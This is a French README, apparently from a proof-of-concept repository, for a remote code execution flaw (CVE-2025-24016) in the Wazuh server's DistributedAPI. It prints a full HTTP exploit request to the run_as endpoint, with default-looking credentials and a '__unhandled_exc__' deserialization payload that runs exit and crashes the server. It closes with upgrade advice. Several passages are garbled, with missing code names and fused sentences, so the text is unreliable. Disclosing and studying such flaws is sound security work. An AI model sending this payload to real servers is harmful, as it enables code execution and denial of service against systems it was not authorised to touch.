
CVE-2025-24016 : RCE dans le serveur Wazuh ! Exécution de code à distance
Ce dépôt démontre la vulnérabilité d'exécution de code à distance (RCE) dans le serveur Wazuh, introduite par une désérialisation non sécurisée dans le paquet wazuh-manager. La vulnérabilité permet aux attaquants distants disposant d'un accès à l'API (tableau de bord compromis, serveurs Wazuh dans le cluster, ou certaines configurations avec des agents compromis) d'exécuter du code arbitraire sur le serveur.
wazuh-manager version >= 4.4.0>= 4.9.1La vulnérabilité se produit dans l'API Wazuh, où les paramètres du DistributedAPI sont sérialisés en JSON et désérialisés à l'aide de dans le fichier . Un attaquant peut exploiter cette vulnérabilité en injectant un dictionnaire non nettoyé dans les requêtes DAPI, ce qui peut conduire à l'évaluation de code Python arbitraire.
as_wazuh_objectframework/wazuh/core/cluster/common.pyLa RCE peut être déclenchée en utilisant le point de terminaison run_as, qui permet à l'attaquant de contrôler l'argument auth_context. En confectionnant une requête malveillante, du code arbitraire peut être exécuté sur le serveur maître.
Pour déclencher cette vulnérabilité en utilisant l'API du serveur, suivez les étapes ci-dessous.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__ qui déclenche l'exécution de code Python arbitraire (exit dans ce cas).>= 4.4.0 jusqu'à 4.9.0 (non corrigée).exit est déclenchée, provoquant l'arrêt du serveur Wazuh.Pour protéger vos systèmes, mettez à jour vers Wazuh version >= 4.9.1 où ce problème est corrigé.